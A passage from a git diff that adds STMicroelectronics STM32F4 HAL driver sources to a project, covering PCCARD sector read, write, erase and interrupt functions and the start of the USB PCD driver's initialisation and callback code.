__HAL_LOCK(hpccard); + + /* Check the PCCARD controller state */ + if(hpccard->State == HAL_PCCARD_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_BUSY; + + /* Initialize PCCARD status */ + *pStatus = PCCARD_READY; + + /* Set the parameters to write a sector */ + *(__IO uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_CYLINDER_HIGH) = (uint16_t)0x00; + *(__IO uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_SECTOR_COUNT) = ((uint16_t)0x0100) | ((uint16_t)SectorAddress); + *(__IO uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD) = (uint16_t)0xE4A0; + + do + { + /* wait till the Status = 0x80 */ + status = *(__IO uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + timeout--; + }while((status == 0x80) && timeout); + + if(timeout == 0U) + { + *pStatus = PCCARD_TIMEOUT_ERROR; + } + + timeout = PCCARD_TIMEOUT_READ_WRITE_SECTOR; + + do + { + /* wait till the Status = PCCARD_STATUS_OK */ + status = *(__IO uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + timeout--; + }while((status != PCCARD_STATUS_OK) && timeout); + + if(timeout == 0U) + { + *pStatus = PCCARD_TIMEOUT_ERROR; + } + + /* Read bytes */ + for(; index < PCCARD_SECTOR_SIZE; index++) + { + *(uint16_t *)pBuffer++ = *(uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR); + } + + /* Update the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hpccard); + + return HAL_OK; +} + + +/** + * @brief Write sector to PCCARD memory + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @param pBuffer pointer to source write buffer + * @param SectorAddress Sector address to write + * @param pStatus pointer to PCCARD status + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCCARD_Write_Sector(PCCARD_HandleTypeDef *hpccard, uint16_t *pBuffer, uint16_t SectorAddress, uint8_t *pStatus) +{ + uint32_t timeout = PCCARD_TIMEOUT_READ_WRITE_SECTOR, index = 0U; + uint8_t status = 0; + + /* Process Locked */ + __HAL_LOCK(hpccard); + + /* Check the PCCARD controller state */ + if(hpccard->State == HAL_PCCARD_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_BUSY; + + /* Initialize PCCARD status */ + *pStatus = PCCARD_READY; + + /* Set the parameters to write a sector */ + *(__IO uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_CYLINDER_HIGH) = (uint16_t)0x00; + *(__IO uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_SECTOR_COUNT) = ((uint16_t)0x0100) | ((uint16_t)SectorAddress); + *(__IO uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD) = (uint16_t)0x30A0; + + do + { + /* Wait till the Status = PCCARD_STATUS_OK */ + status = *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + timeout--; + }while((status != PCCARD_STATUS_OK) && timeout); + + if(timeout == 0U) + { + *pStatus = PCCARD_TIMEOUT_ERROR; + } + + /* Write bytes */ + for(; index < PCCARD_SECTOR_SIZE; index++) + { + *(uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR) = *(uint16_t *)pBuffer++; + } + + do + { + /* Wait till the Status = PCCARD_STATUS_WRITE_OK */ + status = *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + timeout--; + }while((status != PCCARD_STATUS_WRITE_OK) && timeout); + + if(timeout == 0U) + { + *pStatus = PCCARD_TIMEOUT_ERROR; + } + + /* Update the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hpccard); + + return HAL_OK; +} + + +/** + * @brief Erase sector from PCCARD memory + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @param SectorAddress Sector address to erase + * @param pStatus pointer to PCCARD status + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCCARD_Erase_Sector(PCCARD_HandleTypeDef *hpccard, uint16_t SectorAddress, uint8_t *pStatus) +{ + uint32_t timeout = PCCARD_TIMEOUT_ERASE_SECTOR; + uint8_t status = 0; + + /* Process Locked */ + __HAL_LOCK(hpccard); + + /* Check the PCCARD controller state */ + if(hpccard->State == HAL_PCCARD_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_BUSY; + + /* Initialize PCCARD status */ + *pStatus = PCCARD_READY; + + /* Set the parameters to write a sector */ + *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_CYLINDER_LOW) = 0x00; + *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_CYLINDER_HIGH) = 0x00; + *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_SECTOR_NUMBER) = SectorAddress; + *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_SECTOR_COUNT) = 0x01; + *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_CARD_HEAD) = 0xA0; + *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD) = ATA_ERASE_SECTOR_CMD; + + /* wait till the PCCARD is ready */ + status = *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + + while((status != PCCARD_STATUS_WRITE_OK) && timeout) + { + status = *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + timeout--; + } + + if(timeout == 0U) + { + *pStatus = PCCARD_TIMEOUT_ERROR; + } + + /* Check the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hpccard); + + return HAL_OK; +} + +/** + * @brief Reset the PCCARD memory + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCCARD_Reset(PCCARD_HandleTypeDef *hpccard) +{ + /* Process Locked */ + __HAL_LOCK(hpccard); + + /* Check the PCCARD controller state */ + if(hpccard->State == HAL_PCCARD_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Provide a SW reset and Read and verify the: + - PCCard Configuration Option Register at address 0x98000200 --> 0x80 + - Card Configuration and Status Register at address 0x98000202 --> 0x00 + - Pin Replacement Register at address 0x98000204 --> 0x0C + - Socket and Copy Register at address 0x98000206 --> 0x00 + */ + + /* Check the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_BUSY; + + *(__IO uint8_t *)(PCCARD_ATTRIBUTE_SPACE_ADDRESS | ATA_CARD_CONFIGURATION ) = 0x01; + + /* Check the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hpccard); + + return HAL_OK; +} + +/** + * @brief This function handles PCCARD device interrupt request. + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @retval HAL status +*/ +void HAL_PCCARD_IRQHandler(PCCARD_HandleTypeDef *hpccard) +{ + /* Check PCCARD interrupt Rising edge flag */ + if(__FMC_PCCARD_GET_FLAG(hpccard->Instance, FMC_FLAG_RISING_EDGE)) + { + /* PCCARD interrupt callback*/ +#if (USE_HAL_PCCARD_REGISTER_CALLBACKS == 1) + hpccard->ItCallback(hpccard); +#else + HAL_PCCARD_ITCallback(hpccard); +#endif + + /* Clear PCCARD interrupt Rising edge pending bit */ + __FMC_PCCARD_CLEAR_FLAG(hpccard->Instance, FMC_FLAG_RISING_EDGE); + } + + /* Check PCCARD interrupt Level flag */ + if(__FMC_PCCARD_GET_FLAG(hpccard->Instance, FMC_FLAG_LEVEL)) + { + /* PCCARD interrupt callback*/ +#if (USE_HAL_PCCARD_REGISTER_CALLBACKS == 1) + hpccard->ItCallback(hpccard); +#else + HAL_PCCARD_ITCallback(hpccard); +#endif + + /* Clear PCCARD interrupt Level pending bit */ + __FMC_PCCARD_CLEAR_FLAG(hpccard->Instance, FMC_FLAG_LEVEL); + } + + /* Check PCCARD interrupt Falling edge flag */ + if(__FMC_PCCARD_GET_FLAG(hpccard->Instance, FMC_FLAG_FALLING_EDGE)) + { + /* PCCARD interrupt callback*/ +#if (USE_HAL_PCCARD_REGISTER_CALLBACKS == 1) + hpccard->ItCallback(hpccard); +#else + HAL_PCCARD_ITCallback(hpccard); +#endif + + /* Clear PCCARD interrupt Falling edge pending bit */ + __FMC_PCCARD_CLEAR_FLAG(hpccard->Instance, FMC_FLAG_FALLING_EDGE); + } + + /* Check PCCARD interrupt FIFO empty flag */ + if(__FMC_PCCARD_GET_FLAG(hpccard->Instance, FMC_FLAG_FEMPT)) + { + /* PCCARD interrupt callback*/ +#if (USE_HAL_PCCARD_REGISTER_CALLBACKS == 1) + hpccard->ItCallback(hpccard); +#else + HAL_PCCARD_ITCallback(hpccard); +#endif + + /* Clear PCCARD interrupt FIFO empty pending bit */ + __FMC_PCCARD_CLEAR_FLAG(hpccard->Instance, FMC_FLAG_FEMPT); + } +} + +/** + * @brief PCCARD interrupt feature callback + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @retval None + */ +__weak void HAL_PCCARD_ITCallback(PCCARD_HandleTypeDef *hpccard) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpccard); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_PCCARD_ITCallback could be implemented in the user file + */ +} + +#if (USE_HAL_PCCARD_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User PCCARD Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hpccard : PCCARD handle + * @param CallbackId : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_PCCARD_MSP_INIT_CB_ID PCCARD MspInit callback ID + * @arg @ref HAL_PCCARD_MSP_DEINIT_CB_ID PCCARD MspDeInit callback ID + * @arg @ref HAL_PCCARD_IT_CB_ID PCCARD IT callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_PCCARD_RegisterCallback (PCCARD_HandleTypeDef *hpccard, HAL_PCCARD_CallbackIDTypeDef CallbackId, pPCCARD_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hpccard); + + if(hpccard->State == HAL_PCCARD_STATE_READY) + { + switch (CallbackId) + { + case HAL_PCCARD_MSP_INIT_CB_ID : + hpccard->MspInitCallback = pCallback; + break; + case HAL_PCCARD_MSP_DEINIT_CB_ID : + hpccard->MspDeInitCallback = pCallback; + break; + case HAL_PCCARD_IT_CB_ID : + hpccard->ItCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(hpccard->State == HAL_PCCARD_STATE_RESET) + { + switch (CallbackId) + { + case HAL_PCCARD_MSP_INIT_CB_ID : + hpccard->MspInitCallback = pCallback; + break; + case HAL_PCCARD_MSP_DEINIT_CB_ID : + hpccard->MspDeInitCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpccard); + return status; +} + +/** + * @brief Unregister a User PCCARD Callback + * PCCARD Callback is redirected to the weak (surcharged) predefined callback + * @param hpccard : PCCARD handle + * @param CallbackId : ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_PCCARD_MSP_INIT_CB_ID PCCARD MspInit callback ID + * @arg @ref HAL_PCCARD_MSP_DEINIT_CB_ID PCCARD MspDeInit callback ID + * @arg @ref HAL_PCCARD_IT_CB_ID PCCARD IT callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_PCCARD_UnRegisterCallback (PCCARD_HandleTypeDef *hpccard, HAL_PCCARD_CallbackIDTypeDef CallbackId) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hpccard); + + if(hpccard->State == HAL_PCCARD_STATE_READY) + { + switch (CallbackId) + { + case HAL_PCCARD_MSP_INIT_CB_ID : + hpccard->MspInitCallback = HAL_PCCARD_MspInit; + break; + case HAL_PCCARD_MSP_DEINIT_CB_ID : + hpccard->MspDeInitCallback = HAL_PCCARD_MspDeInit; + break; + case HAL_PCCARD_IT_CB_ID : + hpccard->ItCallback = HAL_PCCARD_ITCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(hpccard->State == HAL_PCCARD_STATE_RESET) + { + switch (CallbackId) + { + case HAL_PCCARD_MSP_INIT_CB_ID : + hpccard->MspInitCallback = HAL_PCCARD_MspInit; + break; + case HAL_PCCARD_MSP_DEINIT_CB_ID : + hpccard->MspDeInitCallback = HAL_PCCARD_MspDeInit; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpccard); + return status; +} +#endif + +/** + * @} + */ + +/** @defgroup PCCARD_Exported_Functions_Group3 State functions + * @brief Peripheral State functions + * +@verbatim + ============================================================================== + ##### PCCARD State functions ##### + ============================================================================== + [..] + This subsection permits to get in run-time the status of the PCCARD controller + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief return the PCCARD controller state + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @retval HAL state + */ +HAL_PCCARD_StateTypeDef HAL_PCCARD_GetState(PCCARD_HandleTypeDef *hpccard) +{ + return hpccard->State; +} + +/** + * @brief Get the compact flash memory status + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @retval New status of the PCCARD operation. This parameter can be: + * - CompactFlash_TIMEOUT_ERROR: when the previous operation generate + * a Timeout error + * - CompactFlash_READY: when memory is ready for the next operation + */ +HAL_PCCARD_StatusTypeDef HAL_PCCARD_GetStatus(PCCARD_HandleTypeDef *hpccard) +{ + uint32_t timeout = PCCARD_TIMEOUT_STATUS, status_pccard = 0U; + + /* Check the PCCARD controller state */ + if(hpccard->State == HAL_PCCARD_STATE_BUSY) + { + return HAL_PCCARD_STATUS_ONGOING; + } + + status_pccard = *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + + while((status_pccard == PCCARD_BUSY) && timeout) + { + status_pccard = *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + timeout--; + } + + if(timeout == 0U) + { + status_pccard = PCCARD_TIMEOUT_ERROR; + } + + /* Return the operation status */ + return (HAL_PCCARD_StatusTypeDef) status_pccard; +} + +/** + * @brief Reads the Compact Flash memory status using the Read status command + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @retval The status of the Compact Flash memory. This parameter can be: + * - CompactFlash_BUSY: when memory is busy + * - CompactFlash_READY: when memory is ready for the next operation + * - CompactFlash_ERROR: when the previous operation generates error + */ +HAL_PCCARD_StatusTypeDef HAL_PCCARD_ReadStatus(PCCARD_HandleTypeDef *hpccard) +{ + uint8_t data = 0U, status_pccard = PCCARD_BUSY; + + /* Check the PCCARD controller state */ + if(hpccard->State == HAL_PCCARD_STATE_BUSY) + { + return HAL_PCCARD_STATUS_ONGOING; + } + + /* Read status operation */ + data = *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + + if((data & PCCARD_TIMEOUT_ERROR) == PCCARD_TIMEOUT_ERROR) + { + status_pccard = PCCARD_TIMEOUT_ERROR; + } + else if((data & PCCARD_READY) == PCCARD_READY) + { + status_pccard = PCCARD_READY; + } + + return (HAL_PCCARD_StatusTypeDef) status_pccard; +} + +/** + * @} + */ + +/** + * @} + */ +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx ||\ + STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx */ +#endif /* HAL_PCCARD_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pcd.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pcd.c new file mode 100644 index 000000000..aa9702eed --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pcd.c @@ -0,0 +1,2258 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_pcd.c + * @author MCD Application Team + * @brief PCD HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the USB Peripheral Controller: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The PCD HAL driver can be used as follows: + + (#) Declare a PCD_HandleTypeDef handle structure, for example: + PCD_HandleTypeDef hpcd; + + (#) Fill parameters of Init structure in HCD handle + + (#) Call HAL_PCD_Init() API to initialize the PCD peripheral (Core, Device core, ...) + + (#) Initialize the PCD low level resources through the HAL_PCD_MspInit() API: + (##) Enable the PCD/USB Low Level interface clock using + (+++) __HAL_RCC_USB_OTG_FS_CLK_ENABLE(); + (+++) __HAL_RCC_USB_OTG_HS_CLK_ENABLE(); (For High Speed Mode) + + (##) Initialize the related GPIO clocks + (##) Configure PCD pin-out + (##) Configure PCD NVIC interrupt + + (#)Associate the Upper USB device stack to the HAL PCD Driver: + (##) hpcd.pData = pdev; + + (#)Enable PCD transmission and reception: + (##) HAL_PCD_Start(); + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup PCD PCD + * @brief PCD HAL module driver + * @{ + */ + +#ifdef HAL_PCD_MODULE_ENABLED + +#if defined (USB_OTG_FS) || defined (USB_OTG_HS) + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/** @defgroup PCD_Private_Macros PCD Private Macros + * @{ + */ +#define PCD_MIN(a, b) (((a) < (b)) ? (a) : (b)) +#define PCD_MAX(a, b) (((a) > (b)) ? (a) : (b)) +/** + * @} + */ + +/* Private functions prototypes ----------------------------------------------*/ +/** @defgroup PCD_Private_Functions PCD Private Functions + * @{ + */ +#if defined (USB_OTG_FS) || defined (USB_OTG_HS) +static HAL_StatusTypeDef PCD_WriteEmptyTxFifo(PCD_HandleTypeDef *hpcd, uint32_t epnum); +static HAL_StatusTypeDef PCD_EP_OutXfrComplete_int(PCD_HandleTypeDef *hpcd, uint32_t epnum); +static HAL_StatusTypeDef PCD_EP_OutSetupPacket_int(PCD_HandleTypeDef *hpcd, uint32_t epnum); +#endif /* defined (USB_OTG_FS) || defined (USB_OTG_HS) */ +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup PCD_Exported_Functions PCD Exported Functions + * @{ + */ + +/** @defgroup PCD_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This section provides functions allowing to: + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the PCD according to the specified + * parameters in the PCD_InitTypeDef and initialize the associated handle. + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_Init(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx; + uint8_t i; + + /* Check the PCD handle allocation */ + if (hpcd == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_PCD_ALL_INSTANCE(hpcd->Instance)); + + USBx = hpcd->Instance; + + if (hpcd->State == HAL_PCD_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hpcd->Lock = HAL_UNLOCKED; + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->SOFCallback = HAL_PCD_SOFCallback; + hpcd->SetupStageCallback = HAL_PCD_SetupStageCallback; + hpcd->ResetCallback = HAL_PCD_ResetCallback; + hpcd->SuspendCallback = HAL_PCD_SuspendCallback; + hpcd->ResumeCallback = HAL_PCD_ResumeCallback; + hpcd->ConnectCallback = HAL_PCD_ConnectCallback; + hpcd->DisconnectCallback = HAL_PCD_DisconnectCallback; + hpcd->DataOutStageCallback = HAL_PCD_DataOutStageCallback; + hpcd->DataInStageCallback = HAL_PCD_DataInStageCallback; + hpcd->ISOOUTIncompleteCallback = HAL_PCD_ISOOUTIncompleteCallback; + hpcd->ISOINIncompleteCallback = HAL_PCD_ISOINIncompleteCallback; + hpcd->LPMCallback = HAL_PCDEx_LPM_Callback; + hpcd->BCDCallback = HAL_PCDEx_BCD_Callback; + + if (hpcd->MspInitCallback == NULL) + { + hpcd->MspInitCallback = HAL_PCD_MspInit; + } + + /* Init the low level hardware */ + hpcd->MspInitCallback(hpcd); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC... */ + HAL_PCD_MspInit(hpcd); +#endif /* (USE_HAL_PCD_REGISTER_CALLBACKS) */ + } + + hpcd->State = HAL_PCD_STATE_BUSY; + + /* Disable DMA mode for FS instance */ + if ((USBx->CID & (0x1U << 8)) == 0U) + { + hpcd->Init.dma_enable = 0U; + } + + /* Disable the Interrupts */ + __HAL_PCD_DISABLE(hpcd); + + /*Init the Core (common init.) */ + if (USB_CoreInit(hpcd->Instance, hpcd->Init) != HAL_OK) + { + hpcd->State = HAL_PCD_STATE_ERROR; + return HAL_ERROR; + } + + /* Force Device Mode*/ + (void)USB_SetCurrentMode(hpcd->Instance, USB_DEVICE_MODE); + + /* Init endpoints structures */ + for (i = 0U; i < hpcd->Init.dev_endpoints; i++) + { + /* Init ep structure */ + hpcd->IN_ep[i].is_in = 1U; + hpcd->IN_ep[i].num = i; + hpcd->IN_ep[i].tx_fifo_num = i; + /* Control until ep is activated */ + hpcd->IN_ep[i].type = EP_TYPE_CTRL; + hpcd->IN_ep[i].maxpacket = 0U; + hpcd->IN_ep[i].xfer_buff = 0U; + hpcd->IN_ep[i].xfer_len = 0U; + } + + for (i = 0U; i < hpcd->Init.dev_endpoints; i++) + { + hpcd->OUT_ep[i].is_in = 0U; + hpcd->OUT_ep[i].num = i; + /* Control until ep is activated */ + hpcd->OUT_ep[i].type = EP_TYPE_CTRL; + hpcd->OUT_ep[i].maxpacket = 0U; + hpcd->OUT_ep[i].xfer_buff = 0U; + hpcd->OUT_ep[i].xfer_len = 0U; + } + + /* Init Device */ + if (USB_DevInit(hpcd->Instance, hpcd->Init) != HAL_OK) + { + hpcd->State = HAL_PCD_STATE_ERROR; + return HAL_ERROR; + } + + hpcd->USB_Address = 0U; + hpcd->State = HAL_PCD_STATE_READY; +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) + /* Activate LPM */ + if (hpcd->Init.lpm_enable == 1U) + { + (void)HAL_PCDEx_ActivateLPM(hpcd); + } +#endif /* defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) */ + (void)USB_DevDisconnect(hpcd->Instance); + + return HAL_OK; +} + +/** + * @brief DeInitializes the PCD peripheral. + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_DeInit(PCD_HandleTypeDef *hpcd) +{ + /* Check the PCD handle allocation */ + if (hpcd == NULL) + { + return HAL_ERROR; + } + + hpcd->State = HAL_PCD_STATE_BUSY; + + /* Stop Device */ + if (USB_StopDevice(hpcd->Instance) != HAL_OK) + { + return HAL_ERROR; + } + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + if (hpcd->MspDeInitCallback == NULL) + { + hpcd->MspDeInitCallback = HAL_PCD_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware */ + hpcd->MspDeInitCallback(hpcd); +#else + /* DeInit the low level hardware: CLOCK, NVIC.*/ + HAL_PCD_MspDeInit(hpcd); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + + hpcd->State = HAL_PCD_STATE_RESET; + + return HAL_OK; +} + +/** + * @brief Initializes the PCD MSP. + * @param hpcd PCD handle + * @retval None + */ +__weak void HAL_PCD_MspInit(PCD_HandleTypeDef *hpcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes PCD MSP. + * @param hpcd PCD handle + * @retval None + */ +__weak void HAL_PCD_MspDeInit(PCD_HandleTypeDef *hpcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) +/** + * @brief Register a User USB PCD Callback + * To be used instead of the weak predefined callback + * @param hpcd USB PCD handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_PCD_SOF_CB_ID USB PCD SOF callback ID + * @arg @ref HAL_PCD_SETUPSTAGE_CB_ID USB PCD Setup callback ID + * @arg @ref HAL_PCD_RESET_CB_ID USB PCD Reset callback ID + * @arg @ref HAL_PCD_SUSPEND_CB_ID USB PCD Suspend callback ID + * @arg @ref HAL_PCD_RESUME_CB_ID USB PCD Resume callback ID + * @arg @ref HAL_PCD_CONNECT_CB_ID USB PCD Connect callback ID + * @arg @ref HAL_PCD_DISCONNECT_CB_ID OTG PCD Disconnect callback ID + * @arg @ref HAL_PCD_MSPINIT_CB_ID MspDeInit callback ID + * @arg @ref HAL_PCD_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_RegisterCallback(PCD_HandleTypeDef *hpcd, + HAL_PCD_CallbackIDTypeDef CallbackID, + pPCD_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + switch (CallbackID) + { + case HAL_PCD_SOF_CB_ID : + hpcd->SOFCallback = pCallback; + break; + + case HAL_PCD_SETUPSTAGE_CB_ID : + hpcd->SetupStageCallback = pCallback; + break; + + case HAL_PCD_RESET_CB_ID : + hpcd->ResetCallback = pCallback; + break; + + case HAL_PCD_SUSPEND_CB_ID : + hpcd->SuspendCallback = pCallback; + break; + + case HAL_PCD_RESUME_CB_ID : + hpcd->ResumeCallback = pCallback; + break; + + case HAL_PCD_CONNECT_CB_ID : + hpcd->ConnectCallback = pCallback; + break; + + case HAL_PCD_DISCONNECT_CB_ID : + hpcd->DisconnectCallback = pCallback; + break; + + case HAL_PCD_MSPINIT_CB_ID : + hpcd->MspInitCallback = pCallback; + break; + + case HAL_PCD_MSPDEINIT_CB_ID : + hpcd->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hpcd->State == HAL_PCD_STATE_RESET) + { + switch (CallbackID) + { + case HAL_PCD_MSPINIT_CB_ID : + hpcd->MspInitCallback = pCallback; + break; + + case HAL_PCD_MSPDEINIT_CB_ID : + hpcd->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + return status; +} + +/** + * @brief Unregister an USB PCD Callback + * USB PCD callabck is redirected to the weak predefined callback + * @param hpcd USB PCD handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_PCD_SOF_CB_ID USB PCD SOF callback ID + * @arg @ref HAL_PCD_SETUPSTAGE_CB_ID USB PCD Setup callback ID + * @arg @ref 